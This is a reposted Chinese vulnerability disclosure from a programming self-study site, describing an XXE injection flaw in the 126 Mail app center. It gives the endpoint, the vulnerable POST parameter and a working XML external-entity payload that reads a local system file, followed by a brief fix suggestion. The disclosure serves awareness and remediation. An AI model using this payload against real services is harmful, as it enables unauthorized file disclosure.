好得很程序员自学网

<tfoot draggable='sEl'></tfoot>

126邮箱应用中心XXE注入漏洞 - 网站安全 - 自学p

http://uswebmail.mail.126.com/appcenter/ftentry.do?sid=XXXXXXXXXXX&func=mapp:sequential典型的XXE注入,POST参数var

<?xml version="1.0"?><!DOCTYPE object [ <!ELEMENT string ANY> <!ENTITY xx1 SYSTEM "file:///proc/self/loginuid"> ]><object><array name="items"><object><string name="func">mapp:listBanners</string><object name="var"><int name="position">0</int></object></object><object><string name="func">mapp:&xx1;</string></object></array></object>

 

 

漏洞 修复建议:

使用libxml_disable_entity_loader 等函数

查看更多关于126邮箱应用中心XXE注入漏洞 - 网站安全 - 自学p的详细内容...

声明:本文来自网络,不代表【好得很程序员自学网】立场,转载请注明出处:http://www.haodehen.cn/did15299
  阅读:89次

上一篇: phpwind9.0最新版富文本存储型XSS漏洞 - 网站安全

下一篇:优酷主站stored xss可执行任意js代码 - 网站安全

相关资讯